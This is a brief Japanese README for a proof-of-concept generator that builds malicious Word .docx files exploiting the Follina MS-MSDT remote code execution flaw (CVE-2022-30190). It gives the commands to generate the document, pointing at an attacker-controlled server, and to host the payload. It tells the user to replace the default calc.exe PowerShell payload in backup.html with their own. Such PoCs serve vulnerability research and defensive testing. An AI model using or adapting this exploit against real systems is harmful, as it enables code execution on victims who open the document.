
MS-MSDT Follina CVE-2022-30190 PoC ドキュメント生成ツール
Microsoft Office Word リモートコード実行を悪用する悪意のある docx ジェネレーター
このスクリプトは、LockedByte による CVE-2021-40444 PoC と Tothi による writeup に基づいています。
まず backup.html を修正し、PowerShell ペイロードを置き換えてください。現在は、IEX('calc.exe') を使用して calc.exe を起動するだけです。
python3 exploit.py generate http://<SRV IP>

悪意のある docx を生成したら(out/ に生成されます)、サーバーをセットアップできます:
sudo python3 exploit.py host 80

最後に、Windows 仮想マシンで docx を試してください:
